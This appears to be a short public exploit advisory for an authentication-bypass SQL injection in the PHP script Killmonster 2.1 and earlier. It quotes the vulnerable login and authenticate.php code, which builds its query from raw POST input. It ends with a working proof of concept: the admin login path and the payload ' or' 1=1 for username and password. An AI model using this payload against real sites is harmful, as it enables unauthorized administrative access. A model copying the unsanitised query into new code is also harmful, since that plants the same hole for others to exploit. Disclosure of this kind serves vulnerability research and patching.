29 lines
No EOL
810 B
Text
29 lines
No EOL
810 B
Text
[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability
|
|
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
|
|
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/
|
|
|
|
|
|
[+] Vuln Code :
|
|
|
|
[login.php]
|
|
|
|
<form method="POST" action="authenticate.php">
|
|
Type Username Here: <input type="text" name="isadmin" size="15"><br>
|
|
Type Password Here: <input type="password" name="password" size="15" mask="x"><br>
|
|
<input type="submit" value="submit" name="submit">
|
|
|
|
[authenticate.php]
|
|
|
|
$isadmin=$_POST['isadmin'];
|
|
$password=$_POST['password'];
|
|
$password=md5($password);
|
|
$query = "select * from km_admins where username='$isadmin' and password='$password'";
|
|
$result = mysql_query($query) ;
|
|
|
|
|
|
|
|
|
|
[+] PoC : [Killmonster_path]/admin/login.php
|
|
|
|
username : ' or' 1=1
|
|
password : ' or' 1=1 |